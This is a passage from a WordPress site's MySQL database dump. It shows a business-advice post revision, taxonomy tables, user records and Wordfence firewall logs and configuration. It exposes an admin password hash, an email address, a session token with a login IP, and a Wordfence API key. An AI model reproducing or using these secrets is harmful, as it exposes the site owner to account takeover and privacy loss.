that you could make an even bigger profit from selling your business by developing the property you are looking to sell yourself.\r\n\r\nIn order to do this, we recommend applying for property development loans where you can transform <a href=\"https://www.hunterfinance.co.uk/commercial-property-finance/building-finance\" target=\"_blank\" rel=\"noopener\">your commercial property into a residential one</a> and make a profit.\r\n\r\n<strong>Sell On - </strong>If property development is not for you, you could choose simply to sell the property, whilst you may end up making more from development, it is a quick and safe option just to sell the property on\r\n\r\n<strong>Rent It</strong> - If you are looking to still make an income from your old business, you can rent the old property in order to continue an income.\r\n<h3>More Business Advice</h3>\r\n<ul>\r\n 	<li><a href=\"https://ashbooks.co.uk/business-plan-template-an-easy-way-to-maintain-and-keep-a-tab-on-the-progress-of-business\" target=\"_blank\" rel=\"noopener\">Business plan Template</a></li>\r\n 	<li><a href=\"http://www.ukbi.co.uk/category/business\" target=\"_blank\" rel=\"noopener\">Business – UK Business Innovations </a></li>\r\n 	<li><a href=\"http://www.entrepreneurforum.co.uk/your-questions-answered/small-successful-businesses-in-london\" target=\"_blank\" rel=\"noopener\">Small &amp; Successful Businesses in London</a></li>\r\n</ul>','Selling your business - All you need to know','','inherit','closed','closed','','156-revision-v1','','','2020-03-02 17:56:06','2020-03-02 17:56:06','',156,'https://ashbooks.co.uk/156-revision-v1',0,'revision','',0);
/*!40000 ALTER TABLE `wp_posts` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_term_relationships`
--

DROP TABLE IF EXISTS `wp_term_relationships`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_term_relationships` (
  `object_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `term_taxonomy_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `term_order` int(11) NOT NULL DEFAULT 0,
  PRIMARY KEY (`object_id`,`term_taxonomy_id`),
  KEY `term_taxonomy_id` (`term_taxonomy_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_term_relationships`
--

LOCK TABLES `wp_term_relationships` WRITE;
/*!40000 ALTER TABLE `wp_term_relationships` DISABLE KEYS */;
INSERT INTO `wp_term_relationships` VALUES (5,1,0),(7,1,0),(9,1,0),(11,1,0),(13,1,0),(15,1,0),(17,1,0),(17,2,0),(17,3,0),(17,4,0),(19,1,0),(19,2,0),(19,3,0),(19,4,0),(21,1,0),(23,1,0),(23,2,0),(23,3,0),(23,4,0),(25,1,0),(25,2,0),(25,3,0),(25,4,0),(27,1,0),(27,2,0),(27,3,0),(27,4,0),(29,2,0),(29,3,0),(29,4,0),(31,2,0),(31,3,0),(31,4,0),(33,2,0),(33,3,0),(33,4,0),(35,2,0),(35,3,0),(35,4,0),(37,2,0),(37,3,0),(37,4,0),(39,2,0),(39,3,0),(39,4,0),(41,2,0),(41,3,0),(41,4,0),(43,2,0),(43,3,0),(43,4,0),(45,2,0),(45,3,0),(45,4,0),(47,2,0),(47,3,0),(47,4,0),(49,2,0),(49,3,0),(49,4,0),(129,5,0),(130,5,0),(131,5,0),(132,5,0),(133,5,0),(135,3,0),(144,6,0),(148,3,0),(148,6,0),(148,7,0),(148,8,0),(148,9,0);
/*!40000 ALTER TABLE `wp_term_relationships` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_term_taxonomy`
--

DROP TABLE IF EXISTS `wp_term_taxonomy`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_term_taxonomy` (
  `term_taxonomy_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `term_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `taxonomy` varchar(32) NOT NULL DEFAULT '',
  `description` longtext NOT NULL,
  `parent` bigint(20) unsigned NOT NULL DEFAULT 0,
  `count` bigint(20) NOT NULL DEFAULT 0,
  PRIMARY KEY (`term_taxonomy_id`),
  UNIQUE KEY `term_id_taxonomy` (`term_id`,`taxonomy`),
  KEY `taxonomy` (`taxonomy`)
) ENGINE=InnoDB AUTO_INCREMENT=10 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_term_taxonomy`
--

LOCK TABLES `wp_term_taxonomy` WRITE;
/*!40000 ALTER TABLE `wp_term_taxonomy` DISABLE KEYS */;
INSERT INTO `wp_term_taxonomy` VALUES (1,1,'category','',0,12),(2,2,'category','',0,16),(3,3,'category','',0,18),(4,4,'category','',0,16),(5,5,'nav_menu','',0,5),(6,6,'category','',0,2),(7,7,'post_tag','',0,1),(8,8,'post_tag','',0,1),(9,9,'post_tag','',0,1);
/*!40000 ALTER TABLE `wp_term_taxonomy` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_termmeta`
--

DROP TABLE IF EXISTS `wp_termmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_termmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `term_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `term_id` (`term_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_termmeta`
--

LOCK TABLES `wp_termmeta` WRITE;
/*!40000 ALTER TABLE `wp_termmeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_termmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_terms`
--

DROP TABLE IF EXISTS `wp_terms`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_terms` (
  `term_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(200) NOT NULL DEFAULT '',
  `slug` varchar(200) NOT NULL DEFAULT '',
  `term_group` bigint(10) NOT NULL DEFAULT 0,
  PRIMARY KEY (`term_id`),
  KEY `slug` (`slug`(191)),
  KEY `name` (`name`(191))
) ENGINE=InnoDB AUTO_INCREMENT=10 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_terms`
--

LOCK TABLES `wp_terms` WRITE;
/*!40000 ALTER TABLE `wp_terms` DISABLE KEYS */;
INSERT INTO `wp_terms` VALUES (1,'Marketing','marketing',0),(2,'Social Media','social-media',0),(3,'Business Advice','business-advice',0),(4,'Business Finance','business-finance',0),(5,'Main menu','main-menu',0),(6,'Office Space','office-space',0),(7,'cleaning','cleaning',0),(8,'tips','tips',0),(9,'help','help',0);
/*!40000 ALTER TABLE `wp_terms` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_tm_taskmeta`
--

DROP TABLE IF EXISTS `wp_tm_taskmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_tm_taskmeta` (
  `meta_id` bigint(20) NOT NULL AUTO_INCREMENT,
  `task_id` bigint(20) NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `meta_key` (`meta_key`(191)),
  KEY `task_id` (`task_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_tm_taskmeta`
--

LOCK TABLES `wp_tm_taskmeta` WRITE;
/*!40000 ALTER TABLE `wp_tm_taskmeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_tm_taskmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_tm_tasks`
--

DROP TABLE IF EXISTS `wp_tm_tasks`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_tm_tasks` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) NOT NULL,
  `type` varchar(300) NOT NULL,
  `class_identifier` varchar(300) DEFAULT '0',
  `attempts` int(11) DEFAULT 0,
  `description` varchar(300) DEFAULT NULL,
  `time_created` timestamp NOT NULL DEFAULT current_timestamp(),
  `last_locked_at` bigint(20) DEFAULT 0,
  `status` varchar(300) DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `user_id` (`user_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_tm_tasks`
--

LOCK TABLES `wp_tm_tasks` WRITE;
/*!40000 ALTER TABLE `wp_tm_tasks` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_tm_tasks` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_usermeta`
--

DROP TABLE IF EXISTS `wp_usermeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_usermeta` (
  `umeta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`umeta_id`),
  KEY `user_id` (`user_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB AUTO_INCREMENT=27 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_usermeta`
--

LOCK TABLES `wp_usermeta` WRITE;
/*!40000 ALTER TABLE `wp_usermeta` DISABLE KEYS */;
INSERT INTO `wp_usermeta` VALUES (1,1,'nickname','ashbooks'),(2,1,'first_name',''),(3,1,'last_name',''),(4,1,'description',''),(5,1,'rich_editing','true'),(6,1,'syntax_highlighting','true'),(7,1,'comment_shortcuts','false'),(8,1,'admin_color','fresh'),(9,1,'use_ssl','0'),(10,1,'show_admin_bar_front','true'),(11,1,'locale',''),(12,1,'wp_capabilities','a:1:{s:13:\"administrator\";b:1;}'),(13,1,'wp_user_level','10'),(14,1,'dismissed_wp_pointers','vc_pointers_backend_editor,text_widget_custom_html'),(15,1,'show_welcome_panel','0'),(16,1,'session_tokens','a:1:{s:64:\"1fb242d823aa6955afb414e55c6139f03904835aef0c5cf2d883e03f1fc27233\";a:4:{s:10:\"expiration\";i:1629928346;s:2:\"ip\";s:13:\"103.70.171.77\";s:2:\"ua\";s:78:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0\";s:5:\"login\";i:1629755546;}}'),(17,1,'wp_dashboard_quick_press_last_post_id','167'),(18,1,'community-events-location','a:1:{s:2:\"ip\";s:12:\"103.70.171.0\";}'),(19,1,'edit_post_per_page','23'),(20,1,'wp_user-settings','posts_list_mode=list&libraryContent=browse&editor=tinymce&imgsize=full&align=center'),(21,1,'wp_user-settings-time','1583144847'),(22,1,'edit_comments_per_page','100'),(24,1,'wfls-last-login','1629755547'),(26,1,'last_login_time','2021-08-23 21:52:27');
/*!40000 ALTER TABLE `wp_usermeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_users`
--

DROP TABLE IF EXISTS `wp_users`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_users` (
  `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_login` varchar(60) NOT NULL DEFAULT '',
  `user_pass` varchar(255) NOT NULL DEFAULT '',
  `user_nicename` varchar(50) NOT NULL DEFAULT '',
  `user_email` varchar(100) NOT NULL DEFAULT '',
  `user_url` varchar(100) NOT NULL DEFAULT '',
  `user_registered` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `user_activation_key` varchar(255) NOT NULL DEFAULT '',
  `user_status` int(11) NOT NULL DEFAULT 0,
  `display_name` varchar(250) NOT NULL DEFAULT '',
  PRIMARY KEY (`ID`),
  KEY `user_login_key` (`user_login`),
  KEY `user_nicename` (`user_nicename`),
  KEY `user_email` (`user_email`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_users`
--

LOCK TABLES `wp_users` WRITE;
/*!40000 ALTER TABLE `wp_users` DISABLE KEYS */;
INSERT INTO `wp_users` VALUES (1,'admin','$P$BcdSYiXD/HirT.NTlg9rfrMroHAzDb0','ashbooks','amber.platts@vanillacircus.co.uk','','2018-02-06 09:36:30','',0,'ashbooks');
/*!40000 ALTER TABLE `wp_users` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfblockediplog`
--

DROP TABLE IF EXISTS `wp_wfblockediplog`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfblockediplog` (
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `countryCode` varchar(2) NOT NULL,
  `blockCount` int(10) unsigned NOT NULL DEFAULT 0,
  `unixday` int(10) unsigned NOT NULL,
  `blockType` varchar(50) NOT NULL DEFAULT 'generic',
  PRIMARY KEY (`IP`,`unixday`,`blockType`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfblockediplog`
--

LOCK TABLES `wp_wfblockediplog` WRITE;
/*!40000 ALTER TABLE `wp_wfblockediplog` DISABLE KEYS */;
INSERT INTO `wp_wfblockediplog` VALUES ('\0\0\0\0\0\0\0\0\0\0��\rN+J','JP',11,18859,'waf'),('\0\0\0\0\0\0\0\0\0\0��\rR�]','US',1,18857,'waf'),('\0\0\0\0\0\0\0\0\0\0�����','US',4,18859,'waf'),('\0\0\0\0\0\0\0\0\0\0��aD','US',1,18858,'waf'),('\0\0\0\0\0\0\0\0\0\0��X$@','US',1,18844,'waf'),('\0\0\0\0\0\0\0\0\0\0��X$@','US',1,18846,'waf'),('\0\0\0\0\0\0\0\0\0\0��%\0�','NL',2,18842,'waf'),('\0\0\0\0\0\0\0\0\0\0��%\0�','NL',3,18849,'waf'),('\0\0\0\0\0\0\0\0\0\0��%;5�','FR',2,18858,'waf'),('\0\0\0\0\0\0\0\0\0\0��%�ƴ','UA',2,18841,'waf'),('\0\0\0\0\0\0\0\0\0\0��%�ƴ','UA',2,18851,'waf'),('\0\0\0\0\0\0\0\0\0\0��(w0�','US',51,18840,'waf'),('\0\0\0\0\0\0\0\0\0\0��1\"��','IN',27,18859,'waf'),('\0\0\0\0\0\0\0\0\0\0��EÍT','US',2,18857,'waf'),('\0\0\0\0\0\0\0\0\0\0��M�N','GB',4,18840,'waf'),('\0\0\0\0\0\0\0\0\0\0��M�N','GB',4,18843,'waf'),('\0\0\0\0\0\0\0\0\0\0��Xc\0i','DE',2,18843,'waf'),('\0\0\0\0\0\0\0\0\0\0��g{?','ID',10,18836,'waf'),('\0\0\0\0\0\0\0\0\0\0��g�','',1,18836,'waf'),('\0\0\0\0\0\0\0\0\0\0��i�#v','MA',1,18850,'waf'),('\0\0\0\0\0\0\0\0\0\0���G\r�','NL',7,18853,'waf'),('\0\0\0\0\0\0\0\0\0\0����a�','NO',1,18857,'waf'),('\0\0\0\0\0\0\0\0\0\0���k�?','US',1,18839,'waf'),('\0\0\0\0\0\0\0\0\0\0����O','US',6,18841,'waf'),('\0\0\0\0\0\0\0\0\0\0�����','MV',6,18845,'waf'),('\0\0\0\0\0\0\0\0\0\0���Mo�','CN',2,18835,'waf');
/*!40000 ALTER TABLE `wp_wfblockediplog` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfblocks7`
--

DROP TABLE IF EXISTS `wp_wfblocks7`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfblocks7` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `type` int(10) unsigned NOT NULL DEFAULT 0,
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `blockedTime` bigint(20) NOT NULL,
  `reason` varchar(255) NOT NULL,
  `lastAttempt` int(10) unsigned DEFAULT 0,
  `blockedHits` int(10) unsigned DEFAULT 0,
  `expiration` bigint(20) unsigned NOT NULL DEFAULT 0,
  `parameters` text DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `type` (`type`),
  KEY `IP` (`IP`),
  KEY `expiration` (`expiration`)
) ENGINE=InnoDB AUTO_INCREMENT=18 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfblocks7`
--

LOCK TABLES `wp_wfblocks7` WRITE;
/*!40000 ALTER TABLE `wp_wfblocks7` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wfblocks7` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfconfig`
--

DROP TABLE IF EXISTS `wp_wfconfig`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfconfig` (
  `name` varchar(100) NOT NULL,
  `val` longblob DEFAULT NULL,
  `autoload` enum('no','yes') NOT NULL DEFAULT 'yes',
  PRIMARY KEY (`name`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfconfig`
--

LOCK TABLES `wp_wfconfig` WRITE;
/*!40000 ALTER TABLE `wp_wfconfig` DISABLE KEYS */;
INSERT INTO `wp_wfconfig` VALUES ('actUpdateInterval','2','yes'),('addCacheComment','0','yes'),('adminUserList','b:0;','yes'),('advancedCommentScanning','1','yes'),('ajaxWatcherDisabled_admin','0','yes'),('ajaxWatcherDisabled_front','0','yes'),('alertEmails','wed@ads.com','yes'),('alertOn_adminLogin','1','yes'),('alertOn_block','1','yes'),('alertOn_breachLogin','1','yes'),('alertOn_firstAdminLoginOnly','0','yes'),('alertOn_firstNonAdminLoginOnly','0','yes'),('alertOn_loginLockout','1','yes'),('alertOn_lostPasswdForm','1','yes'),('alertOn_nonAdminLogin','0','yes'),('alertOn_scanIssues','1','yes'),('alertOn_severityLevel','25','yes'),('alertOn_throttle','0','yes'),('alertOn_update','0','yes'),('alertOn_wafDeactivated','1','yes'),('alertOn_wordfenceDeactivated','1','yes'),('alert_maxHourly','0','yes'),('allowed404s','/favicon.ico\n/apple-touch-icon*.png\n/*@2x.png\n/browserconfig.xml','yes'),('allowed404s6116Migration','1','yes'),('allowHTTPSCaching','0','yes'),('allowLegacy2FA','0','yes'),('allowMySQLi','1','yes'),('allScansScheduled','a:0:{}','yes'),('apiKey','d05748b58fb6a701a38e134459df0736ab5ebd36996fe4a300e14a79f76455f70097b9d3f5ab7443c537c4e5ef8349dddb1df6d785f1b0e3308815646a7093fac27fc8f99a6f7d0b12b05b4c43b99ccb','yes'),('autoBlockScanners','1','yes'),('autoUpdate','0','yes'),('autoUpdateAttempts','0','yes'),('bannedURLs','','yes'),('betaThreatDefenseFeed','0','yes'),('blockCustomText','','yes'),('blockedTime','300','yes'),('blocks702Migration','1','yes'),('cacheType','disabled','yes'),('cbl_action','block','yes'),('cbl_bypassRedirDest','','yes'),('cbl_bypassRedirURL','','yes'),('cbl_bypassViewURL','','yes'),('cbl_cookieVal','60d1b86cec067','yes'),('cbl_loggedInBlocked','','yes'),('cbl_redirURL','','yes'),('cbl_restOfSiteBlocked','1','yes'),('checkSpamIP','1','yes'),('config701Migration','1','yes'),('config720Migration','1','yes'),('coreHashes','�\0\0\0\0\0\0\0\Z��a:2:{s:4:\"hash\";s:64:\"c947153e029a74c6d8d1caa85e4aec46022fe0152ffb1dfc23ea508d9e9fe9c4\";s:6:\"hashes\";s:136448:\"\0���W7���ht#�	��q��)��d��$\0��\0(�띰xJ{�h�Ϯ�%��\r^��:��(�5��\0(����Z�Y�Y�@�Iq��ȗ#��T��@\04ߗ�t��\\v�Q�޹��\'_���ajx�Ҧ�\0E=j���ȋ|�p8.�½���֤��SGp�\0Eq�x����Pa���>bv�D��o4V�G;a<��\0^N��弘a�e|K��-��ܰ��ɜ=�\0b�&F�����%|w��*Qr;�|/�=(A���<�\0���#�B�5��j��$#��j!����bN��j�\0�ۧ��4(�K�I|���0��qD.^�v�\0�>|�;(߯\\W*�7?��\n�N��2=�7[Uo\0��i��ք�\"����]�^��XD��2](\0���/��o)��:4]��_���+̔�c���\0�e�*�@�t���\"��q	ȐN��5��H�\0�9�w�i����5�������}���h��\0�Z̈�~�0�=��G�#�C��Z}�*��p\0�T|̅_��S�8��O0μ�¸0����6�\0��-bs�G�\n(hr\Z.�n���!e��z.Yx��U�i��5G���$P�u�v�AT����p�l�J��}���a\Z�\0VX=:��8~\"2�ʦD�I�XV�f�EW��e���G�]���q)6��	�j��nNؤ^}0[P�KXs��+ȉa�w�S���[�U`|WS�PD�羟Nh��b!���#�8i�>kq6�R�E�5��:�\"��;B��i.qX��A4����uU��+ױ���ϱ��T�_^gy�zG�L\"1����U}6:��l|��(㜦��q{��V�~u�<�Dh�o*���cϬ0���x�cl$�	�4��m����o��`vA:����`{rf��_�S3/s��m�?d�^͔0�X0�#q��-ml�*��#T�c��x�E��ƒy�ũ��H���>��$�2��]�%��*�6�\\�dp�ۛ!��s%��]Z�Y�o�ݿ���������r;G�\"��Gu���&�w]�-H�\rRW��\\�5����\'��=�P�����sZF�ԤoD-x?�<�u���q�XQ�7ai�\rIC�pE�K����y��k�ѩ}ˣ�\\�$�p\"�&�p+^���\Z�{�����˜�5�|�f�㵅S�L�o3E�x���ѥU��q�`�q4u���Z����[n�8�O��r7��0H01YL$RRAhJ6��M�w:/�7�.�ڏP���h.B�U-ї�\'Ts��z+p����pHa�P0�4��D�!�2�{�F�͹|���p8$�h��\"d�3���\\��pY�Q�ᣎ�K4ޗ��غ�Ku�\0M�x>]Z�\"�z�8Ŏ�V�M�˻yUL���K��C�Wa��\\��ˁ�\n�;�0�Ġ\"f�АΟ��\'\r͍��D�dM������s�ǿ��ڴ�$2�j)�,\n�\' #6�9\n����ږ��mK�2�e�f�te�4���\Z�GG.�f��Vy`��)\".o[`�ϐ�\r�n���jn�viU\n@,�+!%u	re4�+JuP$,�WN��P�2�\"Ş�,|^��y޲���/\Z(A�1]�/ƅ�B�M�j:��@ѫ�G+S�f�����dV�i�\n�6W��ԑ\\<�O�Ej2�Q����\r�|�X6�����/46�J���?���X�GX�~��u���ic\r�p�����Q��활��\r?c�L�Tӊ���qg�ȫ?c�r�ȸ�t�d���B\rTJ�,Q��$�TDh���((Zd�z��vO����_��;ƀ��E�pY�.�&}��_�	�Q�������oS�nn�̵v�\0)�������Ӥ�:DILV�\0y�Z��)��K�\n��ܘD�~��%Ro��c��7�\r��L��>1�݈]�^]�RɢNF�M��J�,��i�I.2 ��>1�Z�;ר��1ԁ$�!��W:	�Sx�Dq5��/w��_W:��+f�1z��g���\\Y��m�x�GO0���jo].㖽�B�=�f~:N���Fa6�ա�\nY ���\'��i���+�`��fGYbm��UP��M��J�ڡ0�&Cv��M�$����O��4-K�	o6�lb�1E�;�7x�?�-�DZ��Z�zE���*�nk���E�m@������1s��Y�#1$��\Z�=I�����b��XBr�?���ͥ-�!�i�>�[��e�V{�W�!F�P�b<&„A����8�`��]wB�κ��@kp&���h4ԛ�2����f\'�G���IS��}�}R⥅�JЛZ[`�m��I�$=�����D��֛&�Ǿ@�+բ��qO.���x&��*p���@��l����Β/kz=�i���� S����\Z\Z4ڶ1�5���2�3\r#?E�Q���L��Im$�Z��B\Z�!��&�͖��Ck�`7���\'/��]�i��5�\0�����2SC���+2��f!Og�ve�C�h����%%��-��)^\\���\0�t`�k��@���U�OŔ�cp��>�!8HB6������=�b���!��n�z\0�OS~K��|$��T����lJ�b�Ow������f\nT����Eg\ZU�\r����l{��SYD7I�.`��Ï}#٧���JKN��e�ӌ��&��ЎuѡIq�t���n~T	_j��-����%��?�7�0i���}�e�iZ�O�&E+rX�e�{e��mX��<�:�KSy{��r�>K^s�VS2o�H֏�_��)7�����z_oe���ŭy�^/?h;@r�K%��LP��f��c�(|�_]��U�͒o~ME��������s��Rp�d��F[��\'r�5l���蔝媀���s��@Z2]��i���](J~n�3��ϝ�ـ�hj��q�o�2��kL��JQ�c\0�8|V��A�����Nں�)\r�m�MA���D��os,����$���gJ	�Ŗ�7l}�a�������w|�gRLh!���1�R�&\'��k�D\':8YިK�Aa�-�RH�T���������(:�=ߤ\'\\�\0���|�8�(��]x�Z���vJ+�~�S�$ً6��vg�Aќ�ʋQ?�j�`J��N�]�0&��b�\0�V?9�����\"�.�I3�2r)rk�+`�NiM��2]<�	�h\n�˥���O��3�5F���\\�\0���,vS��+p\n�.����\r�J*RT	�!��A&��U�B�tG=_:\\�]>i��?η@ڹ�aKպ�*��Խ+]���ҮgƉ^62�G��\r�S��|�;)�$=X�n!����l=�@�A����:�V56U�x5�Px���&�:V�V��-qX��A9�M�4��-����t\n{���}�MI	AE0N������.T0b([���������oYd��%� �+�[�B��� f�<3)|���y-�d�����]`,5��l9�o���x��;����xZ���q@���51a�Ix���MOY�U�\r�Z�t�Kϭ�uJOyŹ�&Ҹ��*�ܲ�us#��t1��#4����䂹\Z��\'&�8�\0������m9;:��ͼ�f��f�)���I�;��Poi���=�DᎯ�0Sl�hsgܺ{�,��)\Z|����<�\n�x��*����i����`��h��`�P��*ͤ�!j1m!�~�J��\r�O�]��Y<�y�}�\Z�>ɺH���I|��P�����Bb��e�^��Έ;VT1��cj�] k^�O��9�A9�/�\Z�%�@b�.�`�� po��df��?�jr��Y��e|�H��h>�,�ec���R�es5-���D=��<��:3��ϩ�M���>���r�6�Ԥ��%z�uۇ7�}�F���[yx��]k��ݭ�Yr����9�IV,C2�\"���V�l��p�]l2�P�f>�Kp��֚J���bvw�`���*�w��}����*ʘ��)>2�q��e��^�)�P����n�GfR�@Ol,>iv�:�`�tQ�*�8\'�<��\n����J���;�H`�Q؝6pq���a�%��\r��	��\"�A�n�3H�Is�:Y��a�e0BҲy�Pp\nﭾ�����!Λ���&��Ʌ\'M��4�B�S���+\'�4&�$ء��Vgg��o��g~��m/�/&t+���s�����\"#:Z�ܯ4㓉&_&���6\"xF�|w`AZ_+vL\r}��N�P���6������_��Ұ�ݾ��l2�b���qÜ$U�v��	l,s���\"\r�m��`��Yד�U��X^�Ms���6R�H@�	&�冾�B�x��@d�R#U��O�Pg��sH�o�)n��Wr��t�Z�M���?%���V���D��Fv�@�����*9V���μ�[E��Bu}<�\Z#�d�4*�?���d�Q]Bx.|9D��:h@��Q��/U\0-|_ۢ1�g-�+����}�Ԙ!^iB���J��\\W�]�f��@@�w�=	.]��kZ1љm�G���]�x�0���	14\"1�Ix��GL�[	���>(G�A:���	64���� �2DM�M�$�\r澐i�\0���	8\\Ŭ�j�A��ʔ5�+X���o�T�m�_|	M��yu$�1�ck_�K�o�f��m���%�	g)[.�r\n�o�i�{4��Q\n\r8H�\rfX��	v�l���ٮ�!��P��m���\n6|ϔK	~�C�ȫ��7���:��s&u����j��t	�+�{R���ل���n�t,�Ǟ�`���|U�	�	��#t�̹��p=�I\"����)F	֓���-�\nqU��i���-�$�h*��m�l	�Vh���LC��»>U�8.�`�@<K��h	�Ϳ��U%�O�Hޡ�@�~x\\6��~�\n<�:�X�h�QAT����o��p2���8>�\n*��<��ӳ�?HM��\'V���L�\'[R�\n�@&��[DqS�������B��N#F�B��\n*An���.]�B��t�v�!�WҧMw�9�F\n+P_tQ�Vo����7n�\nz#�8�����J\nGk��~ng��m.�3\\�\n��1i��jgָ�\nv�?�u�	���f�h6�2B���?�2\03�}�\nx��m���nV=OD��\0T���)��U��\n}.�����v�e�\n�?�.z��E����+ɡ\n��\\_9(�)7�\n��/�S��\'�g߃�v���\n�9d���g��~@���|�B-�����ڐ�6=��\n�T�[Cp����(,�_V+�L\rۨI��(.��\n�s�H��чc �-y//�?�\r�$M̤j3\n�aqYK�JҔ΀p�\ZJ�j��\\P���\n�\n��ڷ�tn�\r�Ean�J;}(��ҙ���.��9\n�X:��Q�}�+�O�\\�_�	{�ܓC\'a�y:��\n�� �W\"���w�\05�S Nr������h\n�C��0�pFd���l�\0��\"u�~2\"�T��p\Z\n�v�[\0���XZppi�.��c�;~&���\n���&�)h4�_`�F�L��<��:`#pf���\n����RW#ވ� �Q��ē4E[�\'�z�\r��)��k���O�dS0�X�z���_����61k��K(��]1�z�ukpR�!������YC8���`dfh�.^8����!{��F�N�L{��z�)��,�\"�w�W�S��JDz���K�S����uᾒ�M��cc���cdD�(�Q��\\�\ra�[�J?T���?��G�d��(s������t�BUI+u���C�����R����SF2>�3`��v��\'�:js(��-N���֠����N�3����:�VS;���CT\n��]���C�rJ�2����m5CZ�\0�/@@1�1�D�ծ6